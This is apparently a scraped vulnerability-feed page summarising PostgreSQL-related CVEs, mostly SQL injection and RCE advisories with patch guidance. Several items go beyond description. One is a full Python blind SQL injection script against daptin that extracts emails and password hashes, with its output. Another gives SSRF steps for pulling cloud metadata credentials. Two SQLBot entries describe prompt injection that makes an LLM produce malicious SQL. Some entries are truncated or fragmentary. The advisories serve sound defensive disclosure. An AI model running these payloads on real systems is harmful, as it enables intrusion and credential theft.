SQL injection in the Elixir postgrex library allows local attackers with control over PostgreSQL LISTEN/UNLISTEN channel names to execute arbitrary SQL commands including DDL and DML operations. The Postgrex.Notifications module (versions 0.16.0 through 0.22.1) fails to escape double-quote characters in channel arguments, enabling attackers to break out of quoted identifiers and chain multi-statement payloads such as DROP TABLE commands. Vendor patch available in version 0.22.2 per GitHub advisory GHSA-r73h-97w8-m54h. No public exploit code or CISA KEV listing identified at time of analysis, though the technical details and patch diff are publicly disclosed.

SQLi PostgreSQL
NVD GitHub VulDB
EPSS 0% CVSS 9.2
CRITICAL PATCH Act Now

Prior to 2025-11-03, well-intentioned users of Terraform or the REST API for Google Cloud AlloyDB for PostgreSQL could have created clusters with an insecure default password, which could have been exploited by a remote attacker to gain full administrative access to the database. Exploitation required network access to the AlloyDB cluster and was limited to Terraform or the REST API, as other clients blocked it.

Information Disclosure PostgreSQL Google +1
NVD
EPSS 0% CVSS 7.5
HIGH PATCH This Week

{ "nick": "alice", "tagline": "hi", "internal": { "ssn": "111-11-1111", "token": "tok_abcdef", "admin": true } }

Path Traversal PostgreSQL Node.js +1
NVD GitHub
CVSS 9.4
CRITICAL PATCH Act Now

Privilege escalation and OS command execution in CloudNativePG (CNPG) versions prior to 1.28.3 and 1.29.1 allow low-privileged PostgreSQL roles to gain superuser access and execute arbitrary commands inside the primary database pod. The metrics exporter connects as the postgres superuser and only demotes via SET ROLE, leaving session_user as superuser; an attacker who owns a database (including the default `app` role) can shadow unqualified identifiers like `current_database()` referenced in the stock `default-monitoring.yaml`, triggering the chain on the next scrape (≤30s). No public exploit identified at time of analysis, but the vulnerability is highly impactful (CVSS 9.4) and affects default deployments without custom metrics.

Privilege Escalation SQLi PostgreSQL +1
NVD GitHub
EPSS 0% CVSS 8.7
HIGH PATCH This Week

SQL injection in pgAdmin 4 Maintenance Tool allows authenticated users with tools_maintenance permission to execute arbitrary SQL and escalate to operating-system command execution on PostgreSQL database hosts. Four JSON fields (buffer_usage_limit, vacuum_parallel, vacuum_index_cleanup, reindex_tablespace) are concatenated unsafely into VACUUM/ANALYZE/REINDEX commands passed to psql. Attackers can break out of option syntax, inject SQL statements, and leverage PostgreSQL's COPY ... TO PROGRAM to achieve OS-level code execution. Fixed in version 9.15 via server-side allow-listing and proper input sanitization using qtIdent filter. EPSS data not available; no public exploit identified at time of analysis.

SQLi PostgreSQL
NVD GitHub
EPSS 0% CVSS 4.8
MEDIUM PATCH This Month

Stored cross-site scripting (XSS) in pgAdmin 4 before version 9.15 allows authenticated administrators to execute arbitrary JavaScript in the browsers of other pgAdmin users by crafting malicious PostgreSQL object names (databases, schemas, tables, columns) that are rendered unsafely via innerHTML in the Browser Tree and Explain Visualizer modules. The vulnerability requires administrator privileges and user interaction (navigation to or EXPLAIN execution over the malicious object), limiting real-world exploitation scope despite the network attack vector.

XSS PostgreSQL
NVD GitHub
EPSS 0% CVSS 7.6
HIGH PATCH This Week

SQL injection in MikroORM versions ≤7.0.13 (v7) and ≤6.6.13 (v6) allows authenticated attackers to execute arbitrary SQL queries by injecting malicious characters into schema names, JSON property filters, or query builder keys. The vulnerability stems from improper escaping of dialect-specific quote characters in identifier-quoting and JSON-path functions. Multi-tenant applications are at heightened risk of cross-tenant data leakage. Vendor-released patches are available: upgrade to 7.0.14 (v7) or 6.6.14 (v6). No public exploit identified at time of analysis, though the vulnerability was discovered during internal security review by the project maintainer.

Privilege Escalation SQLi PostgreSQL
NVD GitHub
EPSS 0% CVSS 2.3
LOW PATCH Monitor

SQL injection vulnerability in pgx (Go PostgreSQL driver) prior to version 5.9.2 allows authenticated attackers to manipulate queries when the non-default simple protocol is used in conjunction with dollar-quoted string literals containing attacker-controlled placeholder-like text. The vulnerability requires specific configuration (simple protocol mode enabled) and precise SQL structure (dollar-quoted strings with embedded placeholder syntax), making exploitation unlikely in typical deployments but possible in applications explicitly using QueryExecModeSimpleProtocol.

SQLi PostgreSQL
NVD GitHub VulDB
EPSS 0% CVSS 8.1
HIGH PATCH This Week

SQL injection in PraisonAI's multi-backend conversation storage system allows authenticated attackers to execute arbitrary SQL commands. The incomplete fix for CVE-2026-40315 validated input only in SQLiteConversationStore, leaving nine other database backends (MySQL, PostgreSQL, Turso, SingleStore, Supabase, SurrealDB, and their async variants) vulnerable to f-string SQL injection via unvalidated table_prefix and schema parameters. 52 injection points exist across the codebase. Exploitable in multi-tenant deployments or API-driven configurations where table_prefix is derived from external input. Patches released in praisonai 4.6.9 and praisonaiagents 1.6.9 address all affected backends. EPSS and KEV data unavailable; no public POC confirmed at time of analysis.

SQLi PostgreSQL
NVD GitHub
EPSS 0% CVSS 7.1
HIGH PATCH This Week

```python
{"Content-Type": "application/json"})
    try:
        return json.loads(urllib.request.urlopen(req, timeout=10).read(50_000))
    except urllib.request.HTTPError as e:
        return json.loads(e.read(50_000))

def token():
    post("/action/user_account/signup", {"attributes": {
        "name": "poc", "email": "poc@test.com",
        "password": "adminadmin", "passwordConfirm": "adminadmin"}})
    body = post("/action/user_account/signin", {"attributes": {
        "email": "poc@test.com", "password": "adminadmin"}})
    return next(i["Attributes"]["value"] for i in body
                if i.get("ResponseType") == "client.store.set")

def rows(col, jwt):
    q = urllib.parse.urlencode({"query": json.dumps(
        [{"column": col, "operator": "fuzzy", "value": "zzzzz"}])})
    req = urllib.request.Request(f"{BASE}/api/world?{q}&page%5Bsize%5D=5",
                                 headers={"Authorization": "Bearer " + jwt})
    d = json.loads(urllib.request.urlopen(req, timeout=10).read(50_000))
    return len(d.get("data", []))

def oracle(expr, jwt):
    col = f"reference_id) OR ({expr}) OR LOWER(world.reference_id"
    return rows(col, jwt) > 0

def extract_int(sql, jwt, hi=200):
    lo = 0
    while lo < hi:
        mid = (lo + hi + 1) // 2
        if oracle(f"({sql}) >= {mid}", jwt):
            lo = mid
        else:
            hi = mid - 1
    return lo

def extract_str(sql, jwt, maxlen=80):
    n = extract_int(f"LENGTH(({sql}))", jwt, hi=maxlen)
    s = ""
    for _ in range(n):
        lo, hi = 32, 126
        while lo < hi:
            mid = (lo + hi) // 2
            pfx = s.replace("'", "''")
            expr = f"({sql}) >= '{pfx}'||char({mid+1})" if s else f"({sql}) >= char({mid+1})"
            if oracle(expr, jwt):
                lo = mid + 1
            else:
                hi = mid
        s += chr(lo)
    return s

jwt = token()
print("baseline :", rows("reference_id", jwt), "rows")
print("tautology:", rows("reference_id) OR 1=1 OR LOWER(world.reference_id", jwt), "rows")
jwt = token()
print("sqlite_master table count:",
      extract_int("SELECT count(*) FROM sqlite_master WHERE type='table'", jwt, hi=80))
print("email (row 1):", extract_str("SELECT email FROM user_account ORDER BY id LIMIT 1", jwt))
pw_hex = extract_str("SELECT HEX(password) FROM user_account WHERE email='poc@test.com' LIMIT 1",
                     jwt, maxlen=40)
print("pw hash prefix:", bytes.fromhex(pw_hex).decode("ascii", errors="replace"))
```

**Output** (measured on commit `5d32142`, SQLite, macOS arm64):

```
baseline : 0 rows
tautology: 5 rows
sqlite_master table count: 57
email (row 1): guest@cms.go
pw hash prefix: $2a$11$W7vO9oOPzpf7u
```

---

**Attacker precondition**: One valid JWT. Self-signup is enabled by default on a fresh daptin instance - no admin involvement required.

**What is impacted**: The full database is readable via boolean-blind extraction, including all tables visible in `sqlite_master` and credential data (emails, bcrypt password hashes) in `user_account`. Extraction rate is approximately 7 HTTP requests per character, making full-database extraction feasible.

Python SQLi PostgreSQL +2
NVD GitHub
EPSS 0% CVSS 9.0
CRITICAL PATCH Act Now

SQL injection in Rucio's DID search API allows any authenticated user to execute arbitrary SQL against the PostgreSQL metadata database when the postgres_meta plugin is configured. The vulnerability exists in FilterEngine.create_postgres_query where attacker-controlled filter parameters are interpolated directly into raw SQL via Python str.format. Exploitation enables complete database compromise including extraction of authentication tokens, password hashes (SHA-256 single-iteration, GPU-crackable), storage credentials, and session hijacking. Remote code execution is possible via PostgreSQL COPY...FROM PROGRAM if database privileges permit. CVSS 9.9 (Critical) reflects the scope change and cascading impact across confidentiality, integrity, and availability. No public exploit identified at time of analysis, but attack complexity is low (AC:L) requiring only basic authenticated access.

RCE Python SQLi +1
NVD GitHub
EPSS 0% CVSS 9.4
CRITICAL PATCH Act Now

SQL injection in Rucio's DID search API allows any authenticated user to execute arbitrary SQL on Oracle database backends, enabling complete database compromise. The vulnerability affects Rucio versions 1.27.0 through 40.1.0 when deployed with Oracle databases using the default json_meta plugin. Attackers can extract authentication tokens, password hashes (SHA-256 single-iteration, GPU-crackable), storage credentials, and all managed data. Data modification and potential remote code execution via Oracle PL/SQL features are possible. Vendor-confirmed vulnerability with patches released across four version branches. PostgreSQL and MySQL deployments are not affected due to proper SQLAlchemy parameterization on those database dialects.

RCE Python Java +3
NVD GitHub
EPSS 0% CVSS 9.4
CRITICAL PATCH Act Now

Prompt injection in SQLBot 1.7.0 and earlier allows authenticated attackers to execute arbitrary SQL statements through the Text2SQL chat interface, escalating to remote code execution when connected to PostgreSQL databases via COPY FROM PROGRAM. The vulnerability stems from unsanitized user input being directly concatenated into LLM prompts, with resulting SQL executed without validation. CVSS 9.4 (Critical) reflects network-based attack with low complexity requiring only low-privilege authentication. SSVC framework confirms proof-of-concept availability and total technical impact, though exploitation is not fully automatable. Vendor-released patch 1.7.1 addresses the issue.

RCE SQLi PostgreSQL
NVD GitHub VulDB
EPSS 0% CVSS 6.7
MEDIUM PATCH This Month

Authorization bypass in CKAN's datastore_search_sql function allows unauthenticated attackers to access private DataStore resources and extract PostgreSQL system information. CKAN versions prior to 2.10.10 and 2.11.0-2.11.4 are affected. The vulnerability exists in a feature that is disabled by default but can be enabled via configuration, limiting baseline exposure but creating significant risk for deployments that enable SQL search functionality.

Authentication Bypass PostgreSQL
NVD GitHub VulDB
EPSS 3% CVSS 8.3
HIGH PATCH This Week

A vulnerability in `datastore_search_sql` allowed attackers to inject SQL in order to gain access to private resources and PostgreSQL system information. The issue has been patched in CKAN 2.10.10 and CKAN 2.11.5.

Disable the DataStore SQL search (`ckan.datastore.sqlsearch.enabled = false`). Note that the SQL search is disabled by default. As stated in the [documentation](https://docs.ckan.org/en/2.11/maintaining/configuration.html#ckan-datastore-sqlsearch-enabled), this action function has protections that offer some safety but are not designed to prevent all types of abuse. Depending on the sensitivity of private data in a project's DataStore and the likelihood of abuse of a consuming site, a developer may choose to disable this action function or restrict its use with an [`IAuthFunctions`](https://docs.ckan.org/en/2.11/extensions/plugin-interfaces.html#ckan.plugins.interfaces.IAuthFunctions) plugin.

* Reported by Arvin Shivram of Brutecat Security

SQLi PostgreSQL
NVD GitHub VulDB
EPSS 0% CVSS 7.5
HIGH PATCH This Week

pgjdbc is an open source PostgreSQL JDBC driver. From version 42.2.0 to before version 42.7.11, pgjdbc is vulnerable to a client-side denial of service during SCRAM-SHA-256 authentication. A malicious server can instruct the driver to perform SCRAM authentication with a very large iteration count. With a large enough value, the client spends an unbounded amount of CPU time inside PBKDF2 before authentication can fail. A single attempt ties up a CPU core. Repeated or concurrent attempts exhaust client CPU and can wedge connection pools. In affected versions, loginTimeout did not fully mitigate this problem: when loginTimeout expired, the caller could stop waiting, but the worker thread performing the connection attempt could continue running and burning CPU inside the SCRAM PBKDF2 computation. This issue has been patched in version 42.7.11.

Denial Of Service PostgreSQL Red Hat +1
NVD GitHub VulDB
EPSS 0% CVSS 9.8
CRITICAL PATCH Act Now

Remote code execution in H2O-3 versions 3.46.0.9 and earlier allows unauthenticated attackers to execute arbitrary code via the /99/ImportSQLTable REST API by abusing PostgreSQL JDBC driver parameters that bypass an incomplete MySQL-only parameter blacklist. No active exploitation is recorded in CISA KEV and EPSS is low (0.19%), but a vendor patch is available and SSVC marks exploitation status as POC, indicating proof-of-concept-grade attacker capability against a network-reachable endpoint.

RCE PostgreSQL Code Injection
NVD GitHub VulDB
EPSS 0% CVSS 9.1
CRITICAL PATCH Act Now

SQL injection in Jellystat versions prior to 1.1.10 escalates to remote code execution on the PostgreSQL database host. Authenticated attackers can inject arbitrary SQL via multiple API endpoints (`/api/getUserDetails`, `/api/getLibrary`), initially exfiltrating sensitive credentials from the `app_config` table (including Jellystat admin credentials and Jellyfin API keys). Because the application uses node-postgres simple query protocol allowing stacked queries, attackers can leverage PostgreSQL's `COPY ... TO PROGRAM` to achieve command execution on the database server. The project's default docker-compose.yml deploys PostgreSQL with superuser privileges, removing any privilege barriers to RCE. Vendor patch released in version 1.1.10 (GitHub commit 735fe7c confirmed). No active exploitation confirmed by CISA KEV, but publicly available exploit code exists given the detailed technical disclosure in GitHub Security Advisory GHSA-fj7c-2p5q-g56m.

Docker SQLi PostgreSQL
NVD GitHub
EPSS 4% CVSS 7.5
HIGH POC PATCH This Week

SQL injection in NocoBase's @nocobase/database package allows authenticated users with record-creation privileges to execute arbitrary SQL queries and extract database credentials. The vulnerability exists in the queryParentSQL() function, which constructs recursive Common Table Expression (CTE) queries using string concatenation instead of parameterized queries when processing tree collections with string primary keys. An attacker can inject malicious SQL by creating records with crafted primary key values, triggering the vulnerability when recursive eager loading occurs. Successful exploitation leads to full database compromise, with confirmed extraction of administrator credentials (emails and password hashes) in testing against PostgreSQL. On databases where the service account has elevated privileges, attackers can achieve operating system command execution via PostgreSQL's COPY...TO PROGRAM feature. Vendor patch available via GitHub PR #9133.

SQLi PostgreSQL Command Injection +1
NVD GitHub
EPSS 0% CVSS 7.2
HIGH POC PATCH This Week

SQL injection in NocoBase plugin-collection-sql allows authenticated users with collection management permissions to bypass validation controls and execute arbitrary SQL queries. The checkSQL() function blocks dangerous keywords on collection creation and execution but is completely absent from the update endpoint, enabling attackers to create benign SQL collections then modify them with malicious queries to exfiltrate sensitive data including user credentials. Vendor patch available via GitHub PR #9134 and commit 851aee5. CVSS 7.2 reflects high privileges required (PR:H), but real-world impact is severe for environments where collection managers are not fully trusted administrators.

Privilege Escalation SQLi PostgreSQL
NVD GitHub
EPSS 0% CVSS 9.9
CRITICAL PATCH Act Now

Electric is a Postgres sync engine. From 1.1.12 to before 1.5.0, the order_by parameter in the ElectricSQL /v1/shape API is vulnerable to error-based SQL injection, allowing any authenticated user to read, write, and destroy the full contents of the underlying PostgreSQL database through crafted ORDER BY expressions. This vulnerability is fixed in 1.5.0.

SQLi PostgreSQL
NVD GitHub VulDB
EPSS 0% CVSS 4.6
MEDIUM PATCH This Month

OpenBao 2.5.2 and earlier fails to properly quote PostgreSQL schema names during role revocation in the PostgreSQL database secrets engine, allowing authenticated high-privilege administrators to execute arbitrary SQL injection as the database management user. The vulnerability affects the credentials management workflow when revoking database roles, potentially compromising database integrity. A vendor-released patch (version 2.5.3) is available.

SQLi PostgreSQL Red Hat +2
NVD GitHub VulDB
EPSS 0% CVSS 6.4
MEDIUM PATCH This Month

```typescript
  {
    url: trim(url), // User-controlled, no validation
    method,
    headers,
    params,
    timeout,
    ...(method.toLowerCase() !== 'get' && data != null
      ? { data: transformer ? await transformer(data) : data }
      : {}),
  });
```

The `url` at line 98 comes directly from user workflow configuration with only whitespace trimming.

**`packages/plugins/@nocobase/plugin-action-custom-request/src/server/actions/send.ts` lines 172-198:**

```typescript
const axiosRequestConfig = {
  baseURL: ctx.origin,
  ...options,
  url: getParsedValue(url, variables), // User-controlled via template
  headers: { ... },
  params: getParsedValue(arrayToObject(params), variables),
  data: getParsedValue(toJSON(data), variables),
};
const res = await axios(axiosRequestConfig); // No IP validation
```

- No `request-filtering-agent` or SSRF library (confirmed via grep across entire codebase)
- No private IP range filtering
- No cloud metadata endpoint blocking
- No URL scheme validation
- No DNS rebinding protection

1. Authenticated user creates a workflow with HTTP Request node
2. Sets URL to `http://169.254.169.254/latest/meta-data/iam/security-credentials/`
3. Triggers the workflow
4. Server fetches AWS metadata and returns IAM credentials in workflow execution logs

Alternatively via Custom Request action:

1. Create custom request with URL `http://127.0.0.1:5432` or `http://10.0.0.1:8080/admin`
2. Execute the action
3. Server makes request to internal service

- **Cloud metadata theft**: AWS/GCP/Azure credentials via metadata endpoints
- **Internal network access**: Scan and interact with services on private IP ranges
- **Database access**: Connect to localhost databases (PostgreSQL, Redis, etc.)
- **Authentication required**: Yes (authenticated user), but any workspace member can create workflows

PostgreSQL SSRF Microsoft +1
NVD GitHub VulDB
EPSS 0% CVSS 7.5
HIGH PATCH This Week

The SkyWalking OAP /debugging/config/dump endpoint may leak sensitive configuration information of MySQL/PostgreSQL. This issue affects Apache SkyWalking: from 9.7.0 through 10.3.0. Users are recommended to upgrade to version 10.4.0, which fixes the issue.

Apache Information Disclosure PostgreSQL
NVD VulDB
EPSS 5% CVSS 9.1
CRITICAL POC PATCH Act Now

```ts
{ctx.languageCode}' THEN 2 WHEN '${ctx.channel.defaultLanguageCode}' THEN 1 ELSE 0 END`,
  'sort_order',
)
```

TypeORM has no opportunity to parameterize this value because it is embedded directly into the SQL string before being passed to the query builder. The `languageCode` value can originate from the HTTP query string and is set on the request context for every incoming API request. The value is cast to the `LanguageCode` TypeScript type at compile time, but no runtime validation is performed -- the raw query string value is used as-is.

An unauthenticated attacker can append a crafted `languageCode` query parameter to any Shop API request to inject arbitrary SQL into the query. No user interaction is required. The vulnerable endpoint is exposed on every default Vendure installation.

**Upgrade to a patched version immediately.** If you cannot upgrade right away, apply the following hotfix to `RequestContextService.getLanguageCode` to validate the `languageCode` input at the boundary. This blocks injection payloads before they can reach any query:

```ts
private getLanguageCode(req: Request, channel: Channel): LanguageCode | undefined {
    const queryLanguageCode = req.query?.languageCode as string | undefined;
    const isValidFormat = queryLanguageCode && /^[a-zA-Z0-9_-]+$/.test(queryLanguageCode);
    return (
        (isValidFormat ? (queryLanguageCode as LanguageCode) : undefined) ??
        channel.defaultLanguageCode ??
        this.configService.defaultLanguageCode
    );
}
```

This replaces the existing `getLanguageCode` method in `packages/core/src/service/helpers/request-context/request-context.service.ts`. Invalid values are silently dropped and the channel's default language is used instead. The patched versions additionally convert the vulnerable SQL interpolation to a parameterized query as defense in depth.

SQLi PostgreSQL
NVD GitHub
EPSS 0% CVSS 9.9
CRITICAL PATCH Act Now

Remote code execution as root in OpenRemote IoT platform's rules engine (versions prior to 1.20.3) allows authenticated non-superuser attackers with write:rules role to execute arbitrary Java code via unsandboxed JavaScript rulesets. The vulnerability stems from Nashorn ScriptEngine.eval() executing user-supplied JavaScript without ClassFilter restrictions, enabling Java.type() access to any JVM class including java.lang.Runtime. Attackers can compromise the entire multi-tenant platform, steal c

RCE Java Information Disclosure +7
NVD GitHub
EPSS 0% CVSS 9.1
CRITICAL PATCH Act Now

Path traversal (Zip Slip) in gramps-web-api media archive import allows authenticated owner-privileged users to write arbitrary files outside intended directories via malicious ZIP archives. Exploitation requires owner-level access and enables cross-tree data corruption in multi-tree SQLite deployments or config file overwrite in volume-mounted configurations. Postgres+S3 deployments limit impact to ephemeral container storage. No public exploit identified at time of analysis.

Python Docker Path Traversal +1
NVD GitHub
EPSS 0% CVSS 9.3
CRITICAL PATCH Act Now

Unauthenticated remote code execution (RCE) at root level in Aperi'Solve <3.2.1 allows attackers to execute arbitrary commands via unsanitized password input in JPEG upload functionality. Attack requires no authentication (PR:N) and low complexity (AC:L), with CVSS 9.3 critical severity. Publicly available exploit code exists via GitHub advisory. Attackers gain full container compromise with potential pivot to PostgreSQL/Redis databases and, in misconfigured deployments with Docker socket mounts, possible host system takeover. EPSS data not provided, but given unauthenticated network-based vector and public disclosure with fix details, exploitation risk is substantial for exposed instances.

Docker PostgreSQL Command Injection +1
NVD GitHub VulDB
EPSS 0% CVSS 9.9
CRITICAL Act Now

SQL injection in Kestra orchestration platform's flow search endpoint (GET /api/v1/main/flows/search) enables remote code execution on the underlying PostgreSQL host. Authenticated users can trigger the vulnerability by visiting a malicious link, exploiting PostgreSQL's COPY TO PROGRAM feature to execute arbitrary OS commands on the Docker container host. Affects Kestra versions prior to 1.3.7 in default docker-compose deployments. With CVSS 9.9 (Critical) and low attack complexity requiring only low-privilege authentication, this represents a severe risk for container escape and host compromise scenarios.

RCE Docker SQLi +1
NVD GitHub VulDB
EPSS 0% CVSS 9.1
CRITICAL PATCH Act Now

JWT algorithm confusion in fast-jwt npm package allows remote attackers to forge authentication tokens with arbitrary claims by exploiting an incomplete remediation of CVE-2023-48223. The vulnerability (CVSS 9.1 Critical) affects applications using RS256 with public keys containing leading whitespace, a common scenario in database-stored keys, YAML configurations, and environment variables. Attackers possessing the RSA public key (inherently public information) can craft HS256 tokens accepted as valid

RCE Python PostgreSQL
NVD GitHub
EPSS 0% CVSS 8.5
HIGH PATCH This Week

{{$context.data.fieldName}}) directly into raw SQL statements, enabling attackers to break out of string literals and inject malicious SQL commands. Publicly available exploit code exists demonstrating UNION-based injection to extract database credentials and system information. With default Docker deployments granting superuser database privileges, attackers gain full read/write access to the database including credential extraction, data modification, and table deletion capabilities.

Docker SQLi PostgreSQL +1
NVD GitHub
EPSS 0% CVSS 8.2
HIGH PATCH This Week

Stored XSS in DbGate npm package escalates to remote code execution in Electron desktop app via unsanitized SVG icon rendering. Attackers who inject malicious SVG payloads into application definition files can execute arbitrary JavaScript when victims view matching database entries. In the Electron desktop client, insecure configuration (nodeIntegration: true, contextIsolation: false) allows XSS payloads to invoke Node.js APIs, enabling local code execution including file system access. Web depl

XSS RCE PostgreSQL
NVD GitHub
EPSS 0% CVSS 8.7
HIGH PATCH This Week

SQL injection in Hi.Events open-source event management platform (versions 0.8.0-beta.1 through 1.7.0-beta) allows remote unauthenticated attackers to execute arbitrary SQL queries via unsanitized sort_by parameters passed to Eloquent's orderBy() method. The PostgreSQL backend supports stacked queries, enabling multi-statement injection. While CVSS 8.7 reflects high confidentiality impact and no authentication requirement, no public exploit code or CISA KEV listing exists at time of analysis. Vendor-released patch available in version 1.7.1-beta.

SQLi PostgreSQL
NVD GitHub
EPSS 0% CVSS 6.9
MEDIUM PATCH This Month

SQL injection in Alerta's Query string search API (q= parameter) allows unauthenticated remote attackers to execute arbitrary SQL commands against the underlying PostgreSQL database. The vulnerability stems from unsafe f-string interpolation of user-supplied search terms directly into SQL WHERE clauses without parameterization. Alerta versions prior to 9.1.0 are affected; the vulnerability has been patched in version 9.1.0 with no public exploit code identified at time of analysis.

SQLi PostgreSQL
NVD GitHub
EPSS 0% CVSS 7.4
HIGH This Week

SQL injection in SchemaHero 0.23.0 allows remote attackers to execute arbitrary SQL commands through the column parameter in the columnAsInsert function within the PostgreSQL plugin, potentially compromising database integrity and confidentiality. Public exploit documentation is available, indicating proof-of-concept code exists. CVSS and EPSS data are unavailable, limiting formal severity quantification.

SQLi PostgreSQL
NVD GitHub VulDB
EPSS 0% CVSS 7.5
HIGH PATCH This Week

DataRow.Decode in github.com/jackc/pgproto3/v2 fails to validate field length parameters, allowing a malicious or compromised PostgreSQL server to send a DataRow message with a negative field length that triggers a slice bounds out of range panic in Go applications using this library. Affected applications experience denial of service through unexpected termination when connecting to an untrusted or compromised database server. No public exploit code or active exploitation has been confirmed; however, the attack requires only network access to a PostgreSQL endpoint that the vulnerable application connects to.

Information Disclosure PostgreSQL Red Hat +1
NVD GitHub VulDB
EPSS 0% CVSS 8.7
HIGH POC PATCH This Week

SQL injection in n8n's Data Table Get node allows authenticated users with workflow modification permissions to execute arbitrary SQL queries against PostgreSQL backends, enabling data modification and deletion. Public exploit code exists for this vulnerability. Affected versions prior to 1.123.26, 2.13.3, and 2.14.1 should be upgraded immediately, or workflow creation/editing permissions should be restricted to trusted users only.

SQLi PostgreSQL
NVD GitHub VulDB
EPSS 0% CVSS 8.5
HIGH POC PATCH This Week

n8n workflow automation platform Community Edition contains an authorization bypass vulnerability allowing authenticated users with member-level privileges to steal plaintext credentials from other users. The flaw chains name-based credential resolution that doesn't enforce ownership with a permissions bypass affecting generic HTTP credential types (httpBasicAuth, httpHeaderAuth, httpQueryAuth). Attackers can decrypt and exfiltrate credentials without authorization, though native integration credentials remain unaffected.

Authentication Bypass PostgreSQL
NVD GitHub VulDB
EPSS 0% CVSS 8.6
HIGH PATCH This Week

Parse Server versions prior to 8.6.59 and 9.6.0-alpha.53 contain a SQL injection vulnerability in PostgreSQL aggregate operations that allows attackers with master key access to execute arbitrary SQL statements, escalating from application-level administrator privileges to database-level access. Only PostgreSQL-backed Parse Server deployments are affected; MongoDB deployments are not vulnerable. No CVSS score or EPSS data is currently available, and no KEV or active exploitation reports have been confirmed at this time.

Privilege Escalation SQLi PostgreSQL +1
NVD GitHub VulDB
EPSS 0% CVSS 8.1
HIGH PATCH This Week

SQL injection in PostgreSQL via unsafe backslash handling in Kysely's query compiler allows unauthenticated remote attackers to execute arbitrary SQL commands by injecting backslashes into JSON path string literals that bypass quote escaping. The vulnerability affects systems using the default BACKSLASH_ESCAPES SQL mode, where attackers can break out of sanitized JSON path expressions through specially crafted input. No patch is currently available.

SQLi PostgreSQL
NVD GitHub
EPSS 0% CVSS 8.8
HIGH PATCH This Week

SQLBot, an intelligent data query system based on large language models and RAG, contains a critical SQL injection vulnerability in the /api/v1/datasource/uploadExcel endpoint that allows authenticated users with minimal privileges to achieve remote code execution on the backend server. SQLBot versions prior to 1.7.0 are affected, and attackers can exploit unsafe concatenation of Excel sheet names into PostgreSQL table names and COPY statements to inject malicious SQL commands. The vulnerability enables arbitrary command execution as the postgres user, database takeover, and sensitive file exfiltration including /etc/passwd and /etc/shadow.

RCE SQLi PostgreSQL +1
NVD GitHub VulDB
EPSS 1% CVSS 8.8
HIGH PATCH This Week

Remote code execution in SQLBot 1.5.0 and below allows authenticated users to inject malicious prompts through unsanitized terminology uploads, enabling attackers to manipulate the LLM into generating arbitrary PostgreSQL commands executed with database privileges. The vulnerability stems from missing permission checks on the Excel upload API combined with inadequate semantic isolation when injecting user-controlled data into the system prompt. An attacker can exploit this to achieve code execution on the database or application server running as the postgres user.

Authentication Bypass RCE PostgreSQL
NVD GitHub VulDB
EPSS 0% CVSS 7.5
HIGH PATCH This Week

PostgreSQL client applications using the pgproto3 Go library (github.com/jackc/pgproto3/v2) can be crashed remotely by malicious or compromised PostgreSQL servers sending specially crafted DataRow messages with negative field lengths, triggering slice bounds panics that result in denial of service. The vulnerability requires no authentication and has low attack complexity (CVSS:3.1/AV:N/AC:L/PR:N/UI:N), though the EPSS score of 0.07% (20th percentile) suggests minimal observed exploitation activity. Multiple detailed technical advisories exist including analysis from Security Infinity, and the issue is tracked in GitHub issue #2507 for the pgx project.

Buffer Overflow Denial Of Service PostgreSQL +1
NVD GitHub VulDB
EPSS 0% CVSS 8.1
HIGH PATCH This Week

SQL injection in PostgreSQL StatementGenerator allows authenticated attackers to execute arbitrary SQL commands through unsanitized object keys in sort, select, and groupBy parameters on analytics endpoints. The vulnerability exists because column name validation was incompletely applied during a previous fix, leaving three query construction methods vulnerable to direct identifier injection. An attacker with valid credentials can exploit this to access or manipulate database contents without requiring user interaction.

SQLi PostgreSQL
NVD GitHub VulDB
EPSS 0% CVSS 8.2
HIGH PATCH This Week

Kysely through version 0.28.11 contains a SQL injection vulnerability in JSON path compilation affecting MySQL and SQLite dialects. The visitJSONPathLeg() function appends user-controlled values from .key() and .at() methods directly into single-quoted JSON path string literals without escaping single quotes, enabling attackers to break out of the string context and inject arbitrary SQL. A working proof-of-concept demonstrates UNION-based data exfiltration from SQLite databases. The vulnerability has CVSS score 8.2 and patches are available from the vendor.

SQLi PostgreSQL
NVD GitHub VulDB
EPSS 0% CVSS 6.8
MEDIUM PATCH This Month

Administrative users of Docker and PostgreSQL deployments can exploit an incomplete path validation in the `POST /api/file/globalCopyFiles` endpoint to copy sensitive files like container environment variables and Docker secrets from restricted locations (`/proc/`, `/run/secrets/`) into the workspace, where they become readable via standard file APIs. The vulnerability stems from reliance on a blocklist-based validation mechanism that fails to prevent access to these critical system paths. Since no patch is currently available, organizations should restrict administrative access to the affected API endpoint until an update is released.

Docker Path Traversal PostgreSQL +1
NVD GitHub VulDB
EPSS 0% CVSS 5.5
MEDIUM POC This Month

A critical unrestricted file upload vulnerability exists in the Profile Picture Handler component of JawherKl's node-api-postgres library (versions up to 2.5), where improper validation in the path.extname function of index.js allows attackers to upload malicious files remotely without authentication. A proof-of-concept exploit is publicly available, making this vulnerability actively exploitable, though it is not currently listed in CISA's KEV catalog and no EPSS score is provided.

PostgreSQL File Upload
NVD VulDB
EPSS 0% CVSS 5.5
MEDIUM POC This Month

SQL injection in the User.getAll function of node-api-postgres up to version 2.5 allows remote attackers to manipulate the sort parameter and execute arbitrary SQL commands. Public exploit code exists for this vulnerability, and no patch is currently available from the vendor despite early disclosure notification. Affected deployments using PostgreSQL with the vulnerable Node.js API library face risks of unauthorized data access, modification, and potential service disruption.

SQLi PostgreSQL
NVD VulDB
EPSS 0% CVSS 7.7
HIGH This Week

SQL injection in AnythingLLM versions 1.11.1 and earlier enables authenticated users to execute arbitrary SQL commands against connected PostgreSQL, MySQL, and MSSQL databases through the built-in SQL Agent plugin. The vulnerability stems from unsafe string concatenation of table names in the getTableSchemaSql() method across all three database connectors, bypassing proper parameterization. Any user with access to invoke the SQL Agent can exploit this to read, modify, or delete sensitive database contents.

Information Disclosure SQLi PostgreSQL +4
NVD GitHub
EPSS 0% CVSS 9.8
CRITICAL POC PATCH Act Now

Unauthenticated query injection in Parse Server before 9.6.0-alpha.12/8.6.38. PoC available.

Information Disclosure PostgreSQL Node.js +1
NVD GitHub VulDB
EPSS 1% CVSS 9.9
CRITICAL Act Now

Veeam Backup & Replication allows a user with the Backup Viewer role (read-only) to escalate to remote code execution as the postgres database user. A read-only role achieving RCE represents a severe privilege escalation with scope change.

RCE SQLi PostgreSQL
NVD VulDB
EPSS 0% CVSS 4.7
MEDIUM PATCH This Month

